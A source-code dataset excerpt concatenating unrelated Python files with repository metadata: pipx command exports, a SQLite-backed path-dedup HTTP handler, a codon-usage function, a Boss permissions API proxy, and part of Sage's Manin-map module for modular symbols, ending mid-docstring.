from pipx.commands.reinstall import reinstall, reinstall_all
from pipx.commands.run import run
from pipx.commands.run_pip import run_pip
from pipx.commands.uninstall import uninstall, uninstall_all
from pipx.commands.upgrade import upgrade, upgrade_all
__all__ = [
"upgrade",
"upgrade_all",
"run",
"install",
"inject",
"uninstall",
"uninstall_all",
"reinstall",
"reinstall_all",
"list_packages",
"run_pip",
"ensure_pipx_paths",
"environment",
]
| 27.407407
| 60
| 0.759459
|
0a0558d88d74fa41c0a24eee0a5ec8f782f5a2a4
| 2,497
|
py
|
Python
|
api/handler.py
|
jaymoulin/google-musicmanager-dedup-api
|
c16fb7d98449c046ce486cfe21cc94d7a111070b
|
[
"MIT"
] | 2
|
2019-03-02T23:46:05.000Z
|
2020-07-20T21:03:30.000Z
|
api/handler.py
|
jaymoulin/google-musicmanager-dedup-api
|
c16fb7d98449c046ce486cfe21cc94d7a111070b
|
[
"MIT"
] | 1
|
2019-07-12T21:13:33.000Z
|
2019-07-16T17:06:47.000Z
|
api/handler.py
|
jaymoulin/google-musicmanager-dedup-api
|
c16fb7d98449c046ce486cfe21cc94d7a111070b
|
[
"MIT"
] | 1
|
2019-12-12T17:45:46.000Z
|
2019-12-12T17:45:46.000Z
|
from http.server import BaseHTTPRequestHandler
import os
import sqlite3
from urllib.parse import urlparse, parse_qs
from cgi import parse_header, parse_multipart
def _get_connection() -> sqlite3.Connection:
db_path = os.getenv("DB_PATH", "/app/db/googlemusicmanager.db")
db_exists = os.path.isfile(db_path)
if not db_exists:
basedir = os.path.dirname(db_path)
if not os.path.exists(basedir):
os.makedirs(basedir)
open(db_path, 'a').close()
connection = sqlite3.connect(db_path)
if not db_exists:
cursor = connection.cursor()
cursor.execute('CREATE TABLE path (date text, path text)')
connection.commit()
return connection
_connection = _get_connection()
class ApiHandler(BaseHTTPRequestHandler):
def do_GET(self):
path = self._get_path()
cursor = _connection.cursor()
cursor.execute('SELECT count(*) FROM path WHERE path=?', path)
result = cursor.fetchone()[0]
self.send_response(404 if result == 0 else 204)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def do_POST(self):
path = self._get_path()
cursor = _connection.cursor()
cursor.execute('INSERT INTO path (path, "date") VALUES (?, date("now"))', path)
_connection.commit()
self.send_response(204)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def do_DELETE(self):
path = self._get_path()
cursor = _connection.cursor()
cursor.execute('DELETE FROM path WHERE path=?', path)
_connection.commit()
self.send_response(204)
self.send_header('Content-Type', 'application/json')
self.end_headers()
def _get_path(self):
query_components = parse_qs(urlparse(self.path).query)
path = query_components.get("path")
if not path:
postvars = self._parse_POST()
path = (postvars['path'][0],)
return path
def _parse_POST(self):
ctype, pdict = parse_header(self.headers['content-type'])
if ctype == 'multipart/form-data':
postvars = parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers['content-length'])
postvars = parse_qs(self.rfile.read(length).decode('utf-8'), keep_blank_values=1)
else:
postvars = {}
return postvars
| 33.743243
| 93
| 0.634361
|
a7d2f35c6de99272440d09cc31e58e1252e7b558
| 2,028
|
py
|
Python
|
BCAWT/CA_RSCU.py
|
AliYoussef96/BCAW-Tool
|
a296a52f8795325f08e0c6f00838b9e851f9459e
|
[
"MIT"
] | 3
|
2019-10-22T07:08:40.000Z
|
2021-07-27T14:12:25.000Z
|
BCAWT/CA_RSCU.py
|
AliYoussef96/BCAW-Tool
|
a296a52f8795325f08e0c6f00838b9e851f9459e
|
[
"MIT"
] | 13
|
2019-06-26T07:21:25.000Z
|
2021-07-23T15:01:31.000Z
|
BCAWT/CA_RSCU.py
|
AliYoussef96/BCAW-Tool
|
a296a52f8795325f08e0c6f00838b9e851f9459e
|
[
"MIT"
] | 3
|
2019-07-25T00:13:36.000Z
|
2020-09-25T01:58:34.000Z
|
def CA_RSCU(allseq,allseq_name,The_Genetic_Codes_number=1):
"""calculate RSCU values for correspondence analysis.
Args:
allseq (str): DNA sequence
allseq_name (str) : gene name
The_Genetic_Codes_number (int) : default = 1, The Genetic Codes number described by NCBI (https://www.ncbi.nlm.nih.gov/Taxonomy/Utils/wprintgc.cgi)
Returns:
DataFrame: DataFrame contains [gene_name and RSCU values]
"""
from Bio.Data import CodonTable
from Bio.Seq import Seq
import re
from Bio.Alphabet import generic_dna
import pandas as pd
from pandas import DataFrame
from itertools import tee
xcodontable = CodonTable.unambiguous_dna_by_id[1]
ycodontable = xcodontable.forward_table
zcodontable = [ycodontable[i] for i in ycodontable]
qcodontable = [i for i in ycodontable ]
for i in zcodontable:
if zcodontable.count(i) == 1:
zcodontable.remove(i)
RSCU = {}
sequ = str(allseq)
allseqstr, allseqstr_1 = tee(sequ[i: i+3] for i in range(0, len(sequ), 3) if len(sequ[i: i+3]) == 3)
qcodontable = ( i for i in qcodontable)
dic2 = {}
allseqstr2 = Seq('', generic_dna)
for i in allseqstr:
allseqstr2 += i
aminoacid2 = allseqstr2.translate(table = The_Genetic_Codes_number , stop_symbol ='')
aminoacid2 = str(aminoacid2)
RSCUall = {}
for ii in allseqstr_1:
dic2[ii] = dic2.get(ii,0) + 1
for k in qcodontable:
RSCUall[k] = 0
if k in dic2:
try:
rscu2 = dic2[k] / ((1/ zcodontable.count(ycodontable[k]))*(aminoacid2.count(ycodontable[k])))
RSCUall[k] = round(rscu2,6)
except ZeroDivisionError:
pass
df = pd.DataFrame(index=pd.Series([i for i in RSCUall]))
df[allseq_name] = [RSCUall[r] for r in RSCUall ]
df.drop(['ATG'],0,inplace= True)
df.sort_index(inplace=True)
return df
| 32.190476
| 156
| 0.609961
|
9b316bea09d1b228aca02e3036c8eabbc8567d1b
| 6,483
|
py
|
Python
|
src/bossmeta.py
|
NeuroDataDesign/lids-bloby
|
9fb51bfa38d66f3c120c9d42f87b51d915e0ff12
|
[
"Apache-2.0"
] | null | null | null |
src/bossmeta.py
|
NeuroDataDesign/lids-bloby
|
9fb51bfa38d66f3c120c9d42f87b51d915e0ff12
|
[
"Apache-2.0"
] | 1
|
2018-07-18T13:51:46.000Z
|
2018-07-18T13:51:49.000Z
|
src/bossmeta.py
|
NeuroDataDesign/lids-bloby
|
9fb51bfa38d66f3c120c9d42f87b51d915e0ff12
|
[
"Apache-2.0"
] | null | null | null |
import requests
BOSS_VERSION = 'v1'
class BossMeta:
def __init__(self, collection, experiment, channel):
self._collection = collection
self._experiment = experiment
self._channel = channel
self._session = requests.Session()
self._session.stream = False
def session(self):
return self._session
def channel(self):
return self._channel
def experiment(self):
return self._experiment
def collection(self):
return self._collection
class BossRemoteProxy:
def __init__(self, boss_url, token, meta):
self.boss_url = boss_url
if self.boss_url[-1] != '/':
self.boss_url += '/'
self.token = token
# BossMeta contains col, exp, chn info
self.meta = meta
def _get(self, url, headers={}):
if url[0] == '/':
url = url[1:]
headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().get("{}{}".format(
self.boss_url, url), headers=headers)
assert resp.status_code == 200
return resp
def _post(self, url, headers={}, data={}):
if url[0] == '/':
url = url[1:]
headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().post("{}{}".format(self.boss_url, url),
headers=headers, data=data)
if resp.status_code != 201:
print('Failed POST with ', data)
return resp
def _patch(self, url, headers={}, data={}):
if url[0] == '/':
url = url[1:]
headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().patch("{}{}".format(self.boss_url, url),
headers=headers, data=data)
if resp.status_code != 200:
print('Failed PATCH with ', data)
return resp
def _delete(self, url, headers={}, data={}):
if url[0] == '/':
url = url[1:]
headers['Authorization'] = 'Token {}'.format(self.token)
resp = self.meta.session().delete("{}{}".format(self.boss_url, url),
headers=headers, data=data)
if resp.status_code != 202:
print('Failed DEL with ', data)
return resp
def query_perms(self, group, collection, experiment=None, channel=None):
query_url = "{}/permissions/?group={}&collection={}".format(
BOSS_VERSION, group, collection)
if experiment is not None:
query_url = query_url + '&experiment={}'.format(experiment)
if channel is not None:
query_url = query_url + '&channel={}'.format(channel)
r = self._get(query_url)
resp = r.json()
# just the perms of the group
return resp['permission-sets'][0]['permissions']
def list_data(self, list_url):
# print(list_url)
resp = self._get(list_url)
return resp.json()
def list_groups(self):
list_url = "{}/groups/".format(BOSS_VERSION)
return self.list_data(list_url)['groups']
def list_collections(self):
list_url = "{}/collection/".format(BOSS_VERSION)
return self.list_data(list_url)['collections']
def list_experiments(self):
list_url = "{}/collection/{}/experiment/".format(
BOSS_VERSION, self.meta.collection())
return self.list_data(list_url)['experiments']
def list_channels(self, experiment):
list_url = "{}/collection/{}/experiment/{}/channel".format(
BOSS_VERSION, self.meta.collection(), experiment)
return self.list_data(list_url)['channels']
def add_permissions(self, group, permissions, vol_permissions):
self._add_del_perms(group, permissions, vol_permissions, 'add')
def delete_permissions(self, group, permissions, vol_permissions):
self._add_del_perms(group, permissions, vol_permissions, 'del')
def _add_del_perms(self, group, permissions, vol_permissions, add_del):
perm_url = "{}/permissions/".format(BOSS_VERSION)
# set perm on collection
data = {'group': group, 'permissions': permissions,
'collection': self.meta.collection()}
if add_del == 'add':
self._post(perm_url, data=data)
else:
existing_group_perms = self.query_perms(
group, self.meta.collection())
new_perms = diff(existing_group_perms, permissions)
data['permissions'] = new_perms
self._patch(perm_url, data=data)
if self.meta.experiment() is None:
# set perms for all experiments
experiments = self.list_experiments()
else:
experiments = [self.meta.experiment()]
for experiment in experiments:
data = {'group': group, 'permissions': permissions,
'collection': self.meta.collection(), 'experiment': experiment}
if add_del == 'add':
self._post(perm_url, data=data)
else:
existing_group_perms = self.query_perms(
group, self.meta.collection(), experiment=experiment)
new_perms = diff(existing_group_perms, permissions)
data['permissions'] = new_perms
self._patch(perm_url, data=data)
if self.meta.channel() is None:
# set perms for all channels
channels = self.list_channels(experiment)
else:
channels = [self.meta.channel()]
for channel in channels:
data = {'group': group, 'permissions': permissions + vol_permissions,
'collection': self.meta.collection(), 'experiment': experiment, 'channel': channel}
if add_del == 'add':
self._post(perm_url, data=data)
else:
existing_group_perms = self.query_perms(
group, self.meta.collection(), experiment=experiment, channel=channel)
new_perms = diff(existing_group_perms,
permissions + vol_permissions)
data['permissions'] = new_perms
self._patch(perm_url, data=data)
def diff(first, second):
second = set(second)
return [item for item in first if item not in second]
| 36.835227
| 107
| 0.569798
|
136dcb77eb77e45bf1db5cfe5f9b463333ae3a3c
| 34,205
|
py
|
Python
|
src/sage/modular/pollack_stevens/manin_map.py
|
defeo/sage
|
d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | null | null | null |
src/sage/modular/pollack_stevens/manin_map.py
|
defeo/sage
|
d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | null | null | null |
src/sage/modular/pollack_stevens/manin_map.py
|
defeo/sage
|
d8822036a9843bd4d75845024072515ede56bcb9
|
[
"BSL-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
r"""
Manin map
Represents maps from a set of right coset representatives to a
coefficient module.
This is a basic building block for implementing modular symbols, and
provides basic arithmetic and right action of matrices.
EXAMPLES::
sage: E = EllipticCurve('11a')
sage: phi = E.pollack_stevens_modular_symbol()
sage: phi
Modular symbol of level 11 with values in Sym^0 Q^2
sage: phi.values()
[-1/5, 1, 0]
sage: from sage.modular.pollack_stevens.manin_map import ManinMap, M2Z
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10)
sage: MR = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, MR, data)
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: f(M2Z([2,3,4,5]))
1
"""
#*****************************************************************************
# Copyright (C) 2012 Robert Pollack <rpollack@math.bu.edu>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from __future__ import print_function
from __future__ import absolute_import
from sage.rings.continued_fraction import convergents
from sage.misc.misc import verbose
from .sigma0 import Sigma0
from .fund_domain import t00, t10, t01, t11, M2Z
from sage.matrix.matrix_space import MatrixSpace
from sage.rings.integer_ring import ZZ
from sage.parallel.decorate import parallel
from operator import methodcaller
def unimod_matrices_to_infty(r, s):
r"""
Return a list of matrices whose associated unimodular paths connect `0` to ``r/s``.
INPUT:
- ``r``, ``s`` -- rational numbers
OUTPUT:
- a list of matrices in `SL_2(\ZZ)`
EXAMPLES::
sage: v = sage.modular.pollack_stevens.manin_map.unimod_matrices_to_infty(19,23); v
[
[1 0] [ 0 1] [1 4] [-4 5] [ 5 19]
[0 1], [-1 1], [1 5], [-5 6], [ 6 23]
]
sage: [a.det() for a in v]
[1, 1, 1, 1, 1]
sage: sage.modular.pollack_stevens.manin_map.unimod_matrices_to_infty(11,25)
[
[1 0] [ 0 1] [1 3] [-3 4] [ 4 11]
[0 1], [-1 2], [2 7], [-7 9], [ 9 25]
]
ALGORITHM:
This is Manin's continued fraction trick, which gives an expression
`\{0,r/s\} = \{0,\infty\} + ... + \{a,b\} + ... + \{*,r/s\}`, where each `\{a,b\}` is
the image of `\{0,\infty\}` under a matrix in `SL_2(\ZZ)`.
"""
if s == 0:
return []
# the function contfrac_q in
# https://github.com/williamstein/psage/blob/master/psage/modform/rational/modular_symbol_map.pyx
# is very, very relevant to massively optimizing this.
L = convergents(r / s)
# Computes the continued fraction convergents of r/s
v = [M2Z([1, L[0].numerator(), 0, L[0].denominator()])]
# Initializes the list of matrices
for j in range(0, len(L) - 1):
a = L[j].numerator()
c = L[j].denominator()
b = L[j + 1].numerator()
d = L[j + 1].denominator()
v.append(M2Z([(-1) ** (j + 1) * a, b, (-1) ** (j + 1) * c, d]))
# The matrix connecting two consecutive convergents is added on
return v
def unimod_matrices_from_infty(r, s):
r"""
Return a list of matrices whose associated unimodular paths connect `\infty` to ``r/s``.
INPUT:
- ``r``, ``s`` -- rational numbers
OUTPUT:
- a list of `SL_2(\ZZ)` matrices
EXAMPLES::
sage: v = sage.modular.pollack_stevens.manin_map.unimod_matrices_from_infty(19,23); v
[
[ 0 1] [-1 0] [-4 1] [-5 -4] [-19 5]
[-1 0], [-1 -1], [-5 1], [-6 -5], [-23 6]
]
sage: [a.det() for a in v]
[1, 1, 1, 1, 1]
sage: sage.modular.pollack_stevens.manin_map.unimod_matrices_from_infty(11,25)
[
[ 0 1] [-1 0] [-3 1] [-4 -3] [-11 4]
[-1 0], [-2 -1], [-7 2], [-9 -7], [-25 9]
]
ALGORITHM:
This is Manin's continued fraction trick, which gives an expression
`\{\infty,r/s\} = \{\infty,0\} + ... + \{a,b\} + ... + \{*,r/s\}`, where each
`\{a,b\}` is the image of `\{0,\infty\}` under a matrix in `SL_2(\ZZ)`.
"""
if s != 0:
L = convergents(r / s)
# Computes the continued fraction convergents of r/s
v = [M2Z([-L[0].numerator(), 1, -L[0].denominator(), 0])]
# Initializes the list of matrices
# the function contfrac_q in https://github.com/williamstein/psage/blob/master/psage/modform/rational/modular_symbol_map.pyx
# is very, very relevant to massively optimizing this.
for j in range(0, len(L) - 1):
a = L[j].numerator()
c = L[j].denominator()
b = L[j + 1].numerator()
d = L[j + 1].denominator()
v.append(M2Z([-b, (-1) ** (j + 1) * a, -d, (-1) ** (j + 1) * c]))
# The matrix connecting two consecutive convergents is added on
return v
else:
return []
class ManinMap(object):
r"""
Map from a set of right coset representatives of `\Gamma_0(N)` in
`SL_2(\ZZ)` to a coefficient module that satisfies the Manin
relations.
INPUT:
- ``codomain`` -- coefficient module
- ``manin_relations`` -- a :class:`sage.modular.pollack_stevens.fund_domain.ManinRelations` object
- ``defining_data`` -- a dictionary whose keys are a superset of
``manin_relations.gens()`` and a subset of ``manin_relations.reps()``,
and whose values are in the codomain.
- ``check`` -- do numerous (slow) checks and transformations to
ensure that the input data is perfect.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f # indirect doctest
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
"""
def __init__(self, codomain, manin_relations, defining_data, check=True):
"""
INPUT:
- ``codomain`` -- coefficient module
- ``manin_relations`` -- a :class:`ManinRelations` object
- ``defining_data`` -- a dictionary whose keys are a superset of
:meth:`manin_relations.gens()` and a subset of manin_relations.reps(),
and whose values are in the codomain.
- ``check`` -- do numerous (slow) checks and transformations to
ensure that the input data is perfect.
TESTS:
Test that it fails gracefully on some bogus inputs::
sage: from sage.modular.pollack_stevens.manin_map import ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: rels = ManinRelations(37)
sage: ManinMap(ZZ, rels, {})
Traceback (most recent call last):
...
ValueError: Codomain must have an action of Sigma0(N)
sage: ManinMap(Symk(0), rels, [])
Traceback (most recent call last):
...
ValueError: length of defining data must be the same as number of Manin generators
"""
self._codomain = codomain
self._manin = manin_relations
if check:
if not codomain.get_action(Sigma0(manin_relations._N)):
raise ValueError("Codomain must have an action of Sigma0(N)")
self._dict = {}
if isinstance(defining_data, (list, tuple)):
if len(defining_data) != manin_relations.ngens():
raise ValueError("length of defining data must be the same as number of Manin generators")
for i in xrange(len(defining_data)):
self._dict[manin_relations.gen(i)] = codomain(defining_data[i])
elif isinstance(defining_data, dict):
for g in manin_relations.gens():
self._dict[g] = codomain(defining_data[g])
else:
# constant function
try:
c = codomain(defining_data)
except TypeError:
raise TypeError("unrecognized type %s for defining_data" % type(defining_data))
g = manin_relations.gens()
self._dict = dict(zip(g, [c] * len(g)))
else:
self._dict = defining_data
def extend_codomain(self, new_codomain, check=True):
r"""
Extend the codomain of self to new_codomain. There must be a valid conversion operation from the old to the new codomain. This is most often used for extension of scalars from `\QQ` to `\QQ_p`.
EXAMPLE::
sage: from sage.modular.pollack_stevens.manin_map import ManinMap, M2Z
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: m = ManinMap(S, MR, data); m
Map from the set of right cosets of Gamma0(37) in SL_2(Z) to Sym^0 Q^2
sage: m.extend_codomain(Symk(0, Qp(11)))
Map from the set of right cosets of Gamma0(37) in SL_2(Z) to Sym^0 Q_11^2
"""
new_dict = {}
for g in self._manin.gens():
new_dict[g] = new_codomain(self._dict[g])
return ManinMap(new_codomain, self._manin, new_dict, check)
def _compute_image_from_gens(self, B):
r"""
Compute the image of ``B`` under ``self``.
INPUT:
- ``B`` -- generator of Manin relations.
OUTPUT:
- an element in the codomain of self (e.g. a distribution), the image of ``B`` under ``self``.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10)
sage: MR = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, MR, data)
sage: f._compute_image_from_gens(MR.reps()[1])
(10 + 10*11 + O(11^2), 8 + O(11))
"""
L = self._manin.relations(B)
# could raise KeyError if B is not a generator
t = self._codomain(0)
for c, A, g in L:
g1 = self._dict[self._manin.reps(g)] * A
t += g1 * c
return t.normalize()
def __getitem__(self, B):
r"""
Compute the image of ``B`` under ``self``.
INPUT:
- ``B`` -- coset representative of Manin relations.
OUTPUT:
- an element in the codomain of self (e.g. a distribution), the image of ``B`` under ``self``.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37); MR.gens()
[
[1 0] [ 0 -1] [-1 -1] [-1 -2] [-2 -3] [-3 -1] [-1 -4] [-4 -3]
[0 1], [ 1 4], [ 4 3], [ 3 5], [ 5 7], [ 7 2], [ 2 7], [ 7 5],
<BLANKLINE>
[-2 -3]
[ 3 4]
]
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: D = OverconvergentDistributions(2, 37, 40)
sage: f = ManinMap(D, MR, data)
sage: f.__getitem__(MR.gens()[1])
1 + O(37)
sage: f.__getitem__(MR.gens()[3])
O(37^40)
sage: f.__getitem__(MR.gens()[5])
36 + O(37)
sage: f[MR.gens()[5]]
36 + O(37)
"""
try:
return self._dict[B]
except KeyError:
# To prevent memory overflow
return self._compute_image_from_gens(B)
# self._dict[B] = self._compute_image_from_gens(B)
# return self._dict[B]
def compute_full_data(self):
r"""
Compute the values of self on all coset reps from its values on our generating set.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37); MR.gens()
[
[1 0] [ 0 -1] [-1 -1] [-1 -2] [-2 -3] [-3 -1] [-1 -4] [-4 -3]
[0 1], [ 1 4], [ 4 3], [ 3 5], [ 5 7], [ 7 2], [ 2 7], [ 7 5],
<BLANKLINE>
[-2 -3]
[ 3 4]
]
sage: data = {M2Z([-2,-3,5,7]): S(0), M2Z([1,0,0,1]): S(0), M2Z([-1,-2,3,5]): S(0), M2Z([-1,-4,2,7]): S(1), M2Z([0,-1,1,4]): S(1), M2Z([-3,-1,7,2]): S(-1), M2Z([-2,-3,3,4]): S(0), M2Z([-4,-3,7,5]): S(0), M2Z([-1,-1,4,3]): S(0)}
sage: f = ManinMap(S,MR,data)
sage: len(f._dict)
9
sage: f.compute_full_data()
sage: len(f._dict)
38
"""
for B in self._manin.reps():
if not B in self._dict:
self._dict[B] = self._compute_image_from_gens(B)
def __add__(self, right):
r"""
Return sum self + right, where self and right are
assumed to have identical codomains and Manin relations.
INPUT:
- ``self`` and ``right`` -- two Manin maps with the same codomain and Manin relations.
OUTPUT:
- the sum of ``self`` and ``right`` -- a Manin map
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10); D
Space of 11-adic distributions with k=0 action and precision cap 10
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: f+f # indirect doctest
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: (f+f)(M2Z([1,0,0,1]))
(2 + O(11^2), 4 + O(11))
"""
D = {}
sd = self._dict
rd = right._dict
for ky, val in sd.iteritems():
if ky in rd:
D[ky] = val + rd[ky]
return self.__class__(self._codomain, self._manin, D, check=False)
def __sub__(self, right):
"""
Return difference self - right, where self and right are
assumed to have identical codomains and Manin relations.
INPUT:
- ``self`` and ``right`` -- two Manin maps with the same codomain and Manin relations.
OUTPUT:
- the difference of ``self`` and ``right`` -- a Manin map
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10); D
Space of 11-adic distributions with k=0 action and precision cap 10
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: f-f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: (f-f)(M2Z([1,0,0,1]))
(O(11^2), O(11))
"""
D = {}
sd = self._dict
rd = right._dict
for ky, val in sd.iteritems():
if ky in rd:
D[ky] = val - rd[ky]
return self.__class__(self._codomain, self._manin, D, check=False)
def __mul__(self, right):
"""
Return scalar multiplication self * right, where right is in the
base ring of the codomain.
INPUT:
- ``self`` -- a Manin map.
- ``right`` -- an element of the base ring of the codomain of self.
OUTPUT:
- the sum ``self`` and ``right`` -- a Manin map
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: f*2
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: (f*2)(M2Z([1,0,0,1]))
(2 + O(11^2), 4 + O(11))
"""
tp = Sigma0(self._manin.level())(MatrixSpace(ZZ, 2, 2)([1, 0, 0, 1]))
if isinstance(right, type(tp)):
return self._right_action(right)
D = {}
sd = self._dict
for ky, val in sd.iteritems():
D[ky] = val * right
return self.__class__(self._codomain, self._manin, D, check=False)
def __repr__(self):
"""
Return string representation of self.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: D = OverconvergentDistributions(0, 11, 10)
sage: manin = sage.modular.pollack_stevens.fund_domain.ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data)
sage: f.__repr__()
'Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10'
"""
return "Map from the set of right cosets of Gamma0(%s) in SL_2(Z) to %s" % (self._manin.level(), self._codomain)
def _eval_sl2(self, A):
r"""
Return the value of self on the unimodular divisor corresponding to `A`.
Note that `A` must be in `SL_2(Z)` for this to work.
INPUT:
- ``A`` -- an element of `SL_2(Z)`
OUTPUT:
The value of self on the divisor corresponding to `A` -- i.e. on the divisor `\{A(0)\} - \{A(\infty)\}`.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10)
sage: MR = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, MR, data)
sage: A = MR.reps()[1]
sage: f._eval_sl2(A)
(10 + 10*11 + O(11^2), 8 + O(11))
"""
SN = Sigma0(self._manin._N)
A = M2Z(A)
B = self._manin.equivalent_rep(A)
gaminv = SN(B * M2Z(A).adjoint())
return (self[B] * gaminv).normalize()
def __call__(self, A):
"""
Evaluate self at A.
INPUT:
- ``A`` -- a `2 \times 2` matrix
OUTPUT:
The value of self on the divisor corresponding to ``A`` -- an element of the codomain of self.
EXAMPLES::
sage: from sage.modular.pollack_stevens.manin_map import M2Z, ManinMap
sage: from sage.modular.pollack_stevens.fund_domain import ManinRelations
sage: D = OverconvergentDistributions(0, 11, 10); D
Space of 11-adic distributions with k=0 action and precision cap 10
sage: manin = ManinRelations(11)
sage: data = {M2Z([1,0,0,1]):D([1,2]), M2Z([0,-1,1,3]):D([3,5]), M2Z([-1,-1,3,2]):D([1,1])}
sage: f = ManinMap(D, manin, data); f
Map from the set of right cosets of Gamma0(11) in SL_2(Z) to Space of 11-adic distributions with k=0 action and precision cap 10
sage: f(M2Z([1,0,0,1]))
(1 + O(11^2), 2 + O(11))
sage: S = Symk(0,QQ)
sage: MR = ManinRelations(37)
